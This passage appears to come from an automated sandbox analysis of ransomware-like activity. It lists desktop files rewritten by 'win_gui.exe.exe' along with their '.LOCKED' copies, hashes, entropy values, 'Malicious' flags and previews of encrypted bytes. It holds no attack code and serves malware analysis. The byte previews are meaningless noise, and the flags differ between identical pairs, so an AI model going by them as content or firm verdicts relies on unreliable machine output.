                                SHA-512:18CC2D4A889DCC7DBFDEFF3A25F12420B8CBDEBDCB4239F883DD17F61DB6BB3370DB3B828A6723588D2DDAA4E8705E6312EB032AF98E5420E4699D603110CAA1
                                Malicious:false
                                Preview:....U.X..[...{...P.x.Cv,Y4.).g.W.K7....X...../../....n-.C..A.-....^.H.#+I..<..0..+.N:Z.t...m...o..p.CY"I...C.\"..!+P...G..A}..a.W..o....j$.]A..[..vf..u.....+a...I...Q.......j<..}..+(&.&W...)..*)h....T.._l~....%.7.......w..7Q;...D....r...8)gj.V....}.mo..<}.t..0=."O...9..@....'RI.-..2...T....tB..Q.y.....TK.K!...\.h.N..."......J......AJ...S.`.jb....H8.%..?R6..0..o....Z..dl..p..G.rM..E....m.3U...!..~.>.W....W.z..=..X'&0@.T..4..h...l.p.v.._.pX,....c.w/.M..f....B/,.z..l.m4.c.p.f..1.....b....*.k......0.5...b.....m. ..1F0K..D..P...*>.[."<..e.z.s....(&.6..:.... ...{V.....v.w.y...:1.|....u.Z......*....1.&.lGP.'q.!.f.+....z_..R..~GB le4C._...._.......0.......7.oG...;..G....5..c...]a$PO...4*..]....r.....U.`.z.(......B.~......\.I..._R........D.q.u.f$...{.~..4..G.xu.NIT..,.e..o=w.*..2F......./....E`.Zl.R.P....D...PN#.....E.(..4r..3...q..zKE....K.V...?Zw.x.....,w..........\....j.cu......).[+He........6...Vh..?v,4.i...i1U.......`.L.....:.\.

                                C:\Users\user\Desktop\GLTYDMDUST.png.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.86960514371218
                                Encrypted:false
                                SSDEEP:48:D/OSJXq1udgb4NqBoUb0F1OU1/Z/WyYu+MAVMJg6TT2+:1JOuab4NeoUbmOUlZevuAVOTH
                                MD5:205F57F42A4231AF0123C929A27209BE
                                SHA1:E29372C6E0211E7FE78A019F4F17FD7AC54E7868
                                SHA-256:78C5C58025B5524C09A66EF53F48D5DB80E919F6940AEFD3E9C0F2002B7B13C9
                                SHA-512:18CC2D4A889DCC7DBFDEFF3A25F12420B8CBDEBDCB4239F883DD17F61DB6BB3370DB3B828A6723588D2DDAA4E8705E6312EB032AF98E5420E4699D603110CAA1
                                Malicious:false
                                Preview:....U.X..[...{...P.x.Cv,Y4.).g.W.K7....X...../../....n-.C..A.-....^.H.#+I..<..0..+.N:Z.t...m...o..p.CY"I...C.\"..!+P...G..A}..a.W..o....j$.]A..[..vf..u.....+a...I...Q.......j<..}..+(&.&W...)..*)h....T.._l~....%.7.......w..7Q;...D....r...8)gj.V....}.mo..<}.t..0=."O...9..@....'RI.-..2...T....tB..Q.y.....TK.K!...\.h.N..."......J......AJ...S.`.jb....H8.%..?R6..0..o....Z..dl..p..G.rM..E....m.3U...!..~.>.W....W.z..=..X'&0@.T..4..h...l.p.v.._.pX,....c.w/.M..f....B/,.z..l.m4.c.p.f..1.....b....*.k......0.5...b.....m. ..1F0K..D..P...*>.[."<..e.z.s....(&.6..:.... ...{V.....v.w.y...:1.|....u.Z......*....1.&.lGP.'q.!.f.+....z_..R..~GB le4C._...._.......0.......7.oG...;..G....5..c...]a$PO...4*..]....r.....U.`.z.(......B.~......\.I..._R........D.q.u.f$...{.~..4..G.xu.NIT..,.e..o=w.*..2F......./....E`.Zl.R.P....D...PN#.....E.(..4r..3...q..zKE....K.V...?Zw.x.....,w..........\....j.cu......).[+He........6...Vh..?v,4.i...i1U.......`.L.....:.\.

                                C:\Users\user\Desktop\GRXZDKKVDB.docx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874637311883123
                                Encrypted:false
                                SSDEEP:48:aiP/Wb7fUyFYKD0k3K4hOz6xzmkn/WyYu+MAVMJg6T34W:As7RYKeZnevuAVOt
                                MD5:A294BE7969D9BD7F04DF50B72DF91F3A
                                SHA1:CB3439CEAAFC9BF8F7B0A34DB15EA822A1B45DCA
                                SHA-256:85AF450DD6B17B74945FC57942D71C59E63A12610A0CDB91B9821B3339C422F3
                                SHA-512:854A02892806155BC3C2475B0B697B7A81C948B6F35076CAE5243FE36B580446212737649C3BBF594D86BA94C41275AE761D6124EFA2E5A2C05EA307FE922354
                                Malicious:false
                                Preview:UM.\..[.oYp....Xl..}x..........g....#*#..J...-..0|..Z.v.@..@......o.....;.2._;q........d..iT,/9.w...<W....;v..B..r..Zl ....' x.....g$......^9W......C..R.~..6`C.7.ke...../^..s...6....9!..^...f...s.+.*..6.T..".|...0.1z..d.6t.|N.=F....UY..V.w1.J.....).T..Iy+~..Bj..,..va.p..r.65.v...1\@.t.Q.p...>...#.......StB...yI..........X.9.=:V;.._.....s..A.J...,.....z.O..T.!.<t..y.`..<.,2..[..R..|..Q..f.......=-2.......{.ny...q......IL...s...;.!.)...kB....p]...4......N..;../.S.H....6).O.v..X..p.......H.....,X..y.<%g...mz)../v..BzsCK....]..\b..X.AD.i#8..c*a.Kl...\.dU.\3...\..n?I]o.%F....V4NSy....q...q..$;C.&..6..Ld..).i...a...J..}ws.a.p1.H....."..*Ng.q....9}/Kl.U5EurY.c...R..."Kk..k.."..e..[2..).5.[5..|.Sj. .#.`...?.muq8)p&Z.......L=}..Z.Q._#.]+........I.z...).6..."e.\p6...nD.G..~...s....P....d..).X...c.2..C...y.......9.6.w.$.,i.....Cb.?.....0S...p.....Q.UH....!...`.'.......W.F..l.G.}r. ........h...!>......}.QvpU..|+..........a..."":.b.<..)..2.%..I..>wUfd...

                                C:\Users\user\Desktop\GRXZDKKVDB.docx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874637311883123
                                Encrypted:false
                                SSDEEP:48:aiP/Wb7fUyFYKD0k3K4hOz6xzmkn/WyYu+MAVMJg6T34W:As7RYKeZnevuAVOt
                                MD5:A294BE7969D9BD7F04DF50B72DF91F3A
                                SHA1:CB3439CEAAFC9BF8F7B0A34DB15EA822A1B45DCA
                                SHA-256:85AF450DD6B17B74945FC57942D71C59E63A12610A0CDB91B9821B3339C422F3
                                SHA-512:854A02892806155BC3C2475B0B697B7A81C948B6F35076CAE5243FE36B580446212737649C3BBF594D86BA94C41275AE761D6124EFA2E5A2C05EA307FE922354
                                Malicious:false
                                Preview:UM.\..[.oYp....Xl..}x..........g....#*#..J...-..0|..Z.v.@..@......o.....;.2._;q........d..iT,/9.w...<W....;v..B..r..Zl ....' x.....g$......^9W......C..R.~..6`C.7.ke...../^..s...6....9!..^...f...s.+.*..6.T..".|...0.1z..d.6t.|N.=F....UY..V.w1.J.....).T..Iy+~..Bj..,..va.p..r.65.v...1\@.t.Q.p...>...#.......StB...yI..........X.9.=:V;.._.....s..A.J...,.....z.O..T.!.<t..y.`..<.,2..[..R..|..Q..f.......=-2.......{.ny...q......IL...s...;.!.)...kB....p]...4......N..;../.S.H....6).O.v..X..p.......H.....,X..y.<%g...mz)../v..BzsCK....]..\b..X.AD.i#8..c*a.Kl...\.dU.\3...\..n?I]o.%F....V4NSy....q...q..$;C.&..6..Ld..).i...a...J..}ws.a.p1.H....."..*Ng.q....9}/Kl.U5EurY.c...R..."Kk..k.."..e..[2..).5.[5..|.Sj. .#.`...?.muq8)p&Z.......L=}..Z.Q._#.]+........I.z...).6..."e.\p6...nD.G..~...s....P....d..).X...c.2..C...y.......9.6.w.$.,i.....Cb.?.....0S...p.....Q.UH....!...`.'.......W.F..l.G.}r. ........h...!>......}.QvpU..|+..........a..."":.b.<..)..2.%..I..>wUfd...

                                C:\Users\user\Desktop\GRXZDKKVDB.pdf

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855060284912172
                                Encrypted:false
                                SSDEEP:48:EmUEaSALJptGLrk7t/WyYu+MAVMJg6Tthq4:EmUEYbtTevuAVO/q4
                                MD5:FC18F0A5A90C0FD1321F084B2664A607
                                SHA1:FE2C60783DFEE4EC0CD3FE83557F1E0794836C48
                                SHA-256:617B29CC33D3907E3F1909B0245B9783427B0E8F4D515EEAE0FB95735CF37F33
                                SHA-512:29E55D07786A99C7F0B5C17F951C13E1F539F5BDFF505B8E702181375F8D1C6F02AFC9B2C8F6CD5A9DB16E6D95190B2E65B668A1B653F9E7C77D4993B5FAC84D
                                Malicious:true
                                Preview:....}.Y.4c.?....2...K...:..>.i..V..P..#....w....[P..<.._hS.5.*nj\.L}$..}...0...+.g....@Y.l.0{...[....G.?g.iq."g....i...9..Pn.'!~.A...!.Lp. +.v......8.mG....X..`P..m-7.'..."..k.p..7...*.:&.Z....t.x%....f.:o-[..V..HL..@..k4.[..W.....+h......<..v.yG...........s+3.W..A.H.....).}<.../.z9n-P..-.d._..}.6.J&..3.PQF..z'@x...u.T..Vu.%.. .;h=b...s-?\...X.u..X.....U'8(n.R......g....E3..F..F...)4c.@W....G...t..JQ%.BJi.t..k.ib..:.b..k5...w%.#.....)(Q8.C...lB..&...ok.....3..(..}.......R....V..G0*.qK.-.Fc..[<....o..,F.. ..W.... s...6..V.I:q{n..QI....T.V.\fT....Y/..4.X.w+6-..."..3...._....cuJ...r.....]:.h..&.S.,..@..S.3EN&....z.5w..S.w..b......}.sGw..#.&..\.q.7.K.w.:\..<.m.%<P....4....u{........].=.Gq.3.......[.\+Z.."...@.;.U.X.m...w.,.0.0...^.x....X..A..h.o..">.c:.$a.n..ij.u....`.+.....O...8..\....._....Rg.....k..P4.....k....v..gf.,Nj!?*q..&co.y..s....i;.D8S#.cm.K.Xh..`...U.T.4sf....X......C..j.1....H$6.Pw.....3.H...p.....j.a...<01n..m^.b8..R...=......+.......

                                C:\Users\user\Desktop\GRXZDKKVDB.pdf.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855060284912172
                                Encrypted:false
                                SSDEEP:48:EmUEaSALJptGLrk7t/WyYu+MAVMJg6Tthq4:EmUEYbtTevuAVO/q4
                                MD5:FC18F0A5A90C0FD1321F084B2664A607
                                SHA1:FE2C60783DFEE4EC0CD3FE83557F1E0794836C48
                                SHA-256:617B29CC33D3907E3F1909B0245B9783427B0E8F4D515EEAE0FB95735CF37F33
                                SHA-512:29E55D07786A99C7F0B5C17F951C13E1F539F5BDFF505B8E702181375F8D1C6F02AFC9B2C8F6CD5A9DB16E6D95190B2E65B668A1B653F9E7C77D4993B5FAC84D
                                Malicious:false
                                Preview:....}.Y.4c.?....2...K...:..>.i..V..P..#....w....[P..<.._hS.5.*nj\.L}$..}...0...+.g....@Y.l.0{...[....G.?g.iq."g....i...9..Pn.'!~.A...!.Lp. +.v......8.mG....X..`P..m-7.'..."..k.p..7...*.:&.Z....t.x%....f.:o-[..V..HL..@..k4.[..W.....+h......<..v.yG...........s+3.W..A.H.....).}<.../.z9n-P..-.d._..}.6.J&..3.PQF..z'@x...u.T..Vu.%.. .;h=b...s-?\...X.u..X.....U'8(n.R......g....E3..F..F...)4c.@W....G...t..JQ%.BJi.t..k.ib..:.b..k5...w%.#.....)(Q8.C...lB..&...ok.....3..(..}.......R....V..G0*.qK.-.Fc..[<....o..,F.. ..W.... s...6..V.I:q{n..QI....T.V.\fT....Y/..4.X.w+6-..."..3...._....cuJ...r.....]:.h..&.S.,..@..S.3EN&....z.5w..S.w..b......}.sGw..#.&..\.q.7.K.w.:\..<.m.%<P....4....u{........].=.Gq.3.......[.\+Z.."...@.;.U.X.m...w.,.0.0...^.x....X..A..h.o..">.c:.$a.n..ij.u....`.+.....O...8..\....._....Rg.....k..P4.....k....v..gf.,Nj!?*q..&co.y..s....i;.D8S#.cm.K.Xh..`...U.T.4sf....X......C..j.1....H$6.Pw.....3.H...p.....j.a...<01n..m^.b8..R...=......+.......

                                C:\Users\user\Desktop\HMPPSXQPQV.mp3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8584829539120715
                                Encrypted:false
                                SSDEEP:48:IpPNtOMd5NljPRbCXnXYwD93c/WyYu+MAVMJg6TFc7:IZKeVwXNdcevuAVOFm
                                MD5:649049B2E631202C1EAF79B8D39F627E
                                SHA1:2B4326DB75538BD2C2E3B1E013CE126B1D1E91AC
                                SHA-256:3A25C46C47F4F6EE7AD1B18C3812C8DFF58ABB01B9A74938AE14BAF426D4DAF4
                                SHA-512:F9B72B6174E9EC445EB58578F9B1FD259AB333EC18FA7559267EEB8B60A9524DDB80F3FBE62D06E04C4D73B49E82709934BA11461FC4B8A43DA33117C3A92D80
                                Malicious:true
                                Preview:.:..,..=$i...(l..Ph.H..J..s1.u(..O.R>...s+.....G......l..%.E.............Z....D$L..Wq....BE...5.....k.=.]E.WA..f..D..lIa.5.....R.%..'.v.b,s.wJa.,..`..P...D....w,..,q.+B.......w.d;B.......f.d".K.)O...<..........*z.R..wS..R?"..._.Ur.7...........1<p...7|K._...C. ,..lr..J+.5..Y......."{..c..qK...9QNnkN.....r..}7...R9.......T..\Z.........,.m.....B.^upG-)1.....9na.@q?..9^B...1....0k}1.../.-%..._...~}3.DK..'&.V./...,nl...3K..y....{.M.b.D....GiW..a......(...9..uv..........?.gJ..{.-h.Y..T.:."..\s....._[..<.W.....`.....,..2.t/73.$......0H..}[.=....-k..z.D..2.Dlb.e.R.....!.[...!..c.[A..I>.l.R.|U......p.$m....*.<0.9.Ie...........:.).(.._ .V^OF....9.-71....^.la+..2.A..|.,...xw..]..@.X*..!BU.%...=s.s...<...M.7......u.XJ0?LO.^.{..........<.mE.0...7n.....!v.......k.UW. ...q/`..eaW.s.5...^v....)Q7.~...'@.......i.g.-.&..[m./6N.Z..O...#....F.M..-...nk..|A.R*...F.l.wt..z.&A...T8..>H".M.G..C..H.......f....12..\4...B;|..g#..Rp7...$.I..Rg......uH14..7..u...B..5C

                                C:\Users\user\Desktop\HMPPSXQPQV.mp3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8584829539120715
                                Encrypted:false
                                SSDEEP:48:IpPNtOMd5NljPRbCXnXYwD93c/WyYu+MAVMJg6TFc7:IZKeVwXNdcevuAVOFm
                                MD5:649049B2E631202C1EAF79B8D39F627E
                                SHA1:2B4326DB75538BD2C2E3B1E013CE126B1D1E91AC
                                SHA-256:3A25C46C47F4F6EE7AD1B18C3812C8DFF58ABB01B9A74938AE14BAF426D4DAF4
                                SHA-512:F9B72B6174E9EC445EB58578F9B1FD259AB333EC18FA7559267EEB8B60A9524DDB80F3FBE62D06E04C4D73B49E82709934BA11461FC4B8A43DA33117C3A92D80
                                Malicious:false
                                Preview:.:..,..=$i...(l..Ph.H..J..s1.u(..O.R>...s+.....G......l..%.E.............Z....D$L..Wq....BE...5.....k.=.]E.WA..f..D..lIa.5.....R.%..'.v.b,s.wJa.,..`..P...D....w,..,q.+B.......w.d;B.......f.d".K.)O...<..........*z.R..wS..R?"..._.Ur.7...........1<p...7|K._...C. ,..lr..J+.5..Y......."{..c..qK...9QNnkN.....r..}7...R9.......T..\Z.........,.m.....B.^upG-)1.....9na.@q?..9^B...1....0k}1.../.-%..._...~}3.DK..'&.V./...,nl...3K..y....{.M.b.D....GiW..a......(...9..uv..........?.gJ..{.-h.Y..T.:."..\s....._[..<.W.....`.....,..2.t/73.$......0H..}[.=....-k..z.D..2.Dlb.e.R.....!.[...!..c.[A..I>.l.R.|U......p.$m....*.<0.9.Ie...........:.).(.._ .V^OF....9.-71....^.la+..2.A..|.,...xw..]..@.X*..!BU.%...=s.s...<...M.7......u.XJ0?LO.^.{..........<.mE.0...7n.....!v.......k.UW. ...q/`..eaW.s.5...^v....)Q7.~...'@.......i.g.-.&..[m./6N.Z..O...#....F.M..-...nk..|A.R*...F.l.wt..z.&A...T8..>H".M.G..C..H.......f....12..\4...B;|..g#..Rp7...$.I..Rg......uH14..7..u...B..5C

                                C:\Users\user\Desktop\KLIZUSIQEN.jpg

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855484310276105
                                Encrypted:false
                                SSDEEP:48:glkNz/OuyFO0947mQ/WyYu+MAVMJg6Th+:gwzORF7mZevuAVOs
                                MD5:B8A6EFA3392FE3C57674A1A79B99D725
                                SHA1:305426A6C86E7D68273D6CCBDB93C7AB01217F01
                                SHA-256:7114042BFD89420422C54E4A6A9F8B0E0806B38C5C749AB8CB6332B39FDF2A0D
                                SHA-512:0A3FBAD95ABE4391D1689B1E7AB410844C2C23965F66BB0925CF8884C0143AA6070C10431E678266C55FC7AF5B97472F8EF49481898B8145BBE624AD1EC32B9E
                                Malicious:false
                                Preview:zg-..3S..?{..7c>S.+.6.#..G)4.....Go.S"_.$|...T..m.^~:...`..!E.X.S..n.r..0o..oP.u....!.j.m...\W%.....|...C.~..M.e.......k...Q...D:..Ww.H..x+....u.uJ %u7..x._.h.O..%.m..8!=W.o....*.O.~.m.^...q..`....F.3.P.6s.(.T...s.H......&...&V^...Zm.s..)."./..p.yP:28.?.).$=.f.....:.....-.s4.........]?"..6.m..$.O..Z.....l5T.....-c._g..eB}.).c..uu.ns.-`.....+...!%4.....5P....qN.."s.5.....A..l6..w..o.<..*...F{.4_.......LY........v.h..n. ..; ...,.....Wk......X....\.O.....Rjka,..P....'(<...1..._Q.D...23..Wh...F..."..{$.FY.V)...Y'd.Fc..av^.+K.\..e}.4.r..8....#k..... L|.....;..Q%Fm.^R.?>..g3......S..H......lf`b.c.DX`..5.Z4.C..y3t..T4.."(.v...F@.p.....e...X.3Sl..U.J[.w...W.+...kN$.3...ceA.L.8....P...+ h.O.)Ik.......R.1k11>...Q*..J...=.w<.A.e..7.....[....z\.X|G.J....2P.U...`....}.Q_.].>.XH.Z.,52.l.E~*...<.../gz...'..,.Ua....B....wRq&.w.}+m.>....D..l<.h......u%)S.w..:..........}m...).}Z.Z<..........U..B..etS.T...w8...x.....k..Vmo!.).P.....SP..m.w.+..,....=.%.qj$..Z...^..z

                                C:\Users\user\Desktop\KLIZUSIQEN.jpg.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855484310276105
                                Encrypted:false
                                SSDEEP:48:glkNz/OuyFO0947mQ/WyYu+MAVMJg6Th+:gwzORF7mZevuAVOs
                                MD5:B8A6EFA3392FE3C57674A1A79B99D725
                                SHA1:305426A6C86E7D68273D6CCBDB93C7AB01217F01
                                SHA-256:7114042BFD89420422C54E4A6A9F8B0E0806B38C5C749AB8CB6332B39FDF2A0D
                                SHA-512:0A3FBAD95ABE4391D1689B1E7AB410844C2C23965F66BB0925CF8884C0143AA6070C10431E678266C55FC7AF5B97472F8EF49481898B8145BBE624AD1EC32B9E
                                Malicious:false
                                Preview:zg-..3S..?{..7c>S.+.6.#..G)4.....Go.S"_.$|...T..m.^~:...`..!E.X.S..n.r..0o..oP.u....!.j.m...\W%.....|...C.~..M.e.......k...Q...D:..Ww.H..x+....u.uJ %u7..x._.h.O..%.m..8!=W.o....*.O.~.m.^...q..`....F.3.P.6s.(.T...s.H......&...&V^...Zm.s..)."./..p.yP:28.?.).$=.f.....:.....-.s4.........]?"..6.m..$.O..Z.....l5T.....-c._g..eB}.).c..uu.ns.-`.....+...!%4.....5P....qN.."s.5.....A..l6..w..o.<..*...F{.4_.......LY........v.h..n. ..; ...,.....Wk......X....\.O.....Rjka,..P....'(<...1..._Q.D...23..Wh...F..."..{$.FY.V)...Y'd.Fc..av^.+K.\..e}.4.r..8....#k..... L|.....;..Q%Fm.^R.?>..g3......S..H......lf`b.c.DX`..5.Z4.C..y3t..T4.."(.v...F@.p.....e...X.3Sl..U.J[.w...W.+...kN$.3...ceA.L.8....P...+ h.O.)Ik.......R.1k11>...Q*..J...=.w<.A.e..7.....[....z\.X|G.J....2P.U...`....}.Q_.].>.XH.Z.,52.l.E~*...<.../gz...'..,.Ua....B....wRq&.w.}+m.>....D..l<.h......u%)S.w..:..........}m...).}Z.Z<..........U..B..etS.T...w8...x.....k..Vmo!.).P.....SP..m.w.+..,....=.%.qj$..Z...^..z

                                C:\Users\user\Desktop\KLIZUSIQEN.mp3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.871559806560873
                                Encrypted:false
                                SSDEEP:48:y9qGSiWCCHW+IPUS8Pv/WyYu+MAVMJg6TA+:y8ti5C2+IMSqvevuAVOA+
                                MD5:D13A13BBB7A7E1CAF238B76E063DE84F
                                SHA1:83E2F1958E3D61AF700819952822C7CE54DCA5AF
                                SHA-256:429D1D61F6B49310ABCBC7E09C972AF332D9EAED89374349DAEFD5E114E8F468
                                SHA-512:D75ED113B01B1DB4C03077EE5E94085597A8A47610D541DAB64AAFBE8FB486F72075F584CEB236548AA36448D0CD3024BDCCFB08B69A58118A8841A79EA6200D
                                Malicious:true
                                Preview:....Y.k.}..s......x.....b..D....S...D.N..=.n! ........0.u....z....d\J..V;.z6*.V..|xd*...}.c.~....hf...z.......Y..4.eI.*:3.c..0....A'`.z .[.1U K..W...|..Z.V.5.(W<...7.V..T........|P[%.P.a]..'...COX.....w...G......N...tf.......!......>0xV.R:P.r....[......Z.yh1...^;..J..v<iNI'...YY.+u....L;.....q.zL.N..zIRlY.h..B8.h.w..[Q&]...V.OG?.b.;..7}.....~\.Jl.....Q.[...a.r....&~vI.k..p.t#{._...-w..Uk.3..e....'..F.....D.jRGX.k.T{..O....Q*..^ )K%.)..d...f......4;.y*@".I../.L..,..J.._.vQ.9|..........X:.+.f......q...p7.[...K..d..s.a..R.....KJ$TI#....3E.?....6(.3..i..Xg.....`D{..J.k.e.U.>W...~..c.H>..5.*...l.i._j.......bd.....;.b.{....H.;.Ym..O@3.8',......R...*A.Q@...M....Ll..V....:......ry?..H. .,...8.&_:..U............!.n.f+.h+,L,.(.o.mp.,c..V0....Op.. ..Z..o..k....MB.r.n......}2f.B.4...{.......6.&=..F.....Bo...5aa..a..V.j.f..m....I.....A_.#. ..^.k/V#P..n8.=..[.....6k.u..lH|}. C.T@8.f..c..T}-...6...wO.h.b.....V......z..8y..i3l...:..B@W}.Z.4P.F.....:tA...J

                                C:\Users\user\Desktop\KLIZUSIQEN.mp3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.871559806560873
                                Encrypted:false
                                SSDEEP:48:y9qGSiWCCHW+IPUS8Pv/WyYu+MAVMJg6TA+:y8ti5C2+IMSqvevuAVOA+
                                MD5:D13A13BBB7A7E1CAF238B76E063DE84F
                                SHA1:83E2F1958E3D61AF700819952822C7CE54DCA5AF
                                SHA-256:429D1D61F6B49310ABCBC7E09C972AF332D9EAED89374349DAEFD5E114E8F468
                                SHA-512:D75ED113B01B1DB4C03077EE5E94085597A8A47610D541DAB64AAFBE8FB486F72075F584CEB236548AA36448D0CD3024BDCCFB08B69A58118A8841A79EA6200D
                                Malicious:false
                                Preview:....Y.k.}..s......x.....b..D....S...D.N..=.n! ........0.u....z....d\J..V;.z6*.V..|xd*...}.c.~....hf...z.......Y..4.eI.*:3.c..0....A'`.z .[.1U K..W...|..Z.V.5.(W<...7.V..T........|P[%.P.a]..'...COX.....w...G......N...tf.......!......>0xV.R:P.r....[......Z.yh1...^;..J..v<iNI'...YY.+u....L;.....q.zL.N..zIRlY.h..B8.h.w..[Q&]...V.OG?.b.;..7}.....~\.Jl.....Q.[...a.r....&~vI.k..p.t#{._...-w..Uk.3..e....'..F.....D.jRGX.k.T{..O....Q*..^ )K%.)..d...f......4;.y*@".I../.L..,..J.._.vQ.9|..........X:.+.f......q...p7.[...K..d..s.a..R.....KJ$TI#....3E.?....6(.3..i..Xg.....`D{..J.k.e.U.>W...~..c.H>..5.*...l.i._j.......bd.....;.b.{....H.;.Ym..O@3.8',......R...*A.Q@...M....Ll..V....:......ry?..H. .,...8.&_:..U............!.n.f+.h+,L,.(.o.mp.,c..V0....Op.. ..Z..o..k....MB.r.n......}2f.B.4...{.......6.&=..F.....Bo...5aa..a..V.j.f..m....I.....A_.#. ..^.k/V#P..n8.=..[.....6k.u..lH|}. C.T@8.f..c..T}-...6...wO.h.b.....V......z..8y..i3l...:..B@W}.Z.4P.F.....:tA...J

                                C:\Users\user\Desktop\KLIZUSIQEN.pdf

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.861651192882324
                                Encrypted:false
                                SSDEEP:48:r0UCJNEMHzqjPYecd6hVi8l8z+HE/WyYu+MAVMJg6TR:kXHzqjQvd6nscEevuAVOR
                                MD5:3B13D5185DCE68D970F49BBC3DF1FC11
                                SHA1:1DBC8D21B63AD1B6906B44F9C45ACD97E95A5CF8
                                SHA-256:47CFE4FE9633D4D891CF882524C2C59E197EB217082C1985606622FCAE3FB266
                                SHA-512:857A21A8F7721A7D583A51CF52B9681C9C5D22EE236E474C4E25732912C13B3068CE3422AA5CE07C9C64A8C220E88FBAAB10CA00757DD71AD27B612BA0A36067
                                Malicious:false
                                Preview:.eSK......+.)X~R...j...S{....bN...{.%.[...D.h......d.......'.tt..i.-...%..?..o..XT.P..\o5R...1r...[...#.tU..k.....C.Gp..m..r2..2.Q).<..@.&..p...o.*yl.~..5.....m...b.b..r.i........lH..YP.@#.l. ....*c)...eG..7*Z.s....P...[.v.5.-G..(...f.........W....Yn.M..%N.H..Y7....+.?....M.._S ..Oln4D<.)d.].<gcf....>.....-X...0w.<..?b@...._.m.f.T.a.'..........R..u.b.^.kLH5..q..'..[.G...Ev..@.}.?PF../....=...6*v.Q.Vk..~;....;C.Q.......ZO.#=...5.8..5.k...Z...n.w..YDp2.a.S.&...*.mv.#.?1oj...%.H...L.K%..r..H.C%...B.fds.......ZPt>.m.Lkm.N.@#S..$.f....}.X.....".o.X^g...?.I.3!fi....y...e.mz..L.}4eT....c...r2OF.......FU...7.....d5..(.K.W(...}.....Y..T.2,-....AfZ....n.....X.r.F=.....O..U.\......pw0Zw.9]T...3...6.@....X.p]W...fpm6A.!..\..t..........rM.....D.......o...VN.[..G.q~U+...}....Q..G....`...X6k/...=T+{.1..g..nk..|d...t.......".......%"@NV/..mgN..#.e..l.P.C...c...utWx.O.l..L....E.W.e.,;h-..<$Z.......*..`....Lv.1....].sS!.D.... 0..K...;.%...?.........2.e..y./..#....(.>...A

                                C:\Users\user\Desktop\KLIZUSIQEN.pdf.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.861651192882324
                                Encrypted:false
                                SSDEEP:48:r0UCJNEMHzqjPYecd6hVi8l8z+HE/WyYu+MAVMJg6TR:kXHzqjQvd6nscEevuAVOR
                                MD5:3B13D5185DCE68D970F49BBC3DF1FC11
                                SHA1:1DBC8D21B63AD1B6906B44F9C45ACD97E95A5CF8
                                SHA-256:47CFE4FE9633D4D891CF882524C2C59E197EB217082C1985606622FCAE3FB266
                                SHA-512:857A21A8F7721A7D583A51CF52B9681C9C5D22EE236E474C4E25732912C13B3068CE3422AA5CE07C9C64A8C220E88FBAAB10CA00757DD71AD27B612BA0A36067
                                Malicious:false
                                Preview:.eSK......+.)X~R...j...S{....bN...{.%.[...D.h......d.......'.tt..i.-...%..?..o..XT.P..\o5R...1r...[...#.tU..k.....C.Gp..m..r2..2.Q).<..@.&..p...o.*yl.~..5.....m...b.b..r.i........lH..YP.@#.l. ....*c)...eG..7*Z.s....P...[.v.5.-G..(...f.........W....Yn.M..%N.H..Y7....+.?....M.._S ..Oln4D<.)d.].<gcf....>.....-X...0w.<..?b@...._.m.f.T.a.'..........R..u.b.^.kLH5..q..'..[.G...Ev..@.}.?PF../....=...6*v.Q.Vk..~;....;C.Q.......ZO.#=...5.8..5.k...Z...n.w..YDp2.a.S.&...*.mv.#.?1oj...%.H...L.K%..r..H.C%...B.fds.......ZPt>.m.Lkm.N.@#S..$.f....}.X.....".o.X^g...?.I.3!fi....y...e.mz..L.}4eT....c...r2OF.......FU...7.....d5..(.K.W(...}.....Y..T.2,-....AfZ....n.....X.r.F=.....O..U.\......pw0Zw.9]T...3...6.@....X.p]W...fpm6A.!..\..t..........rM.....D.......o...VN.[..G.q~U+...}....Q..G....`...X6k/...=T+{.1..g..nk..|d...t.......".......%"@NV/..mgN..#.e..l.P.C...c...utWx.O.l..L....E.W.e.,;h-..<$Z.......*..`....Lv.1....].sS!.D.... 0..K...;.%...?.........2.e..y./..#....(.>...A

                                C:\Users\user\Desktop\NVWZAPQSQL.docx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
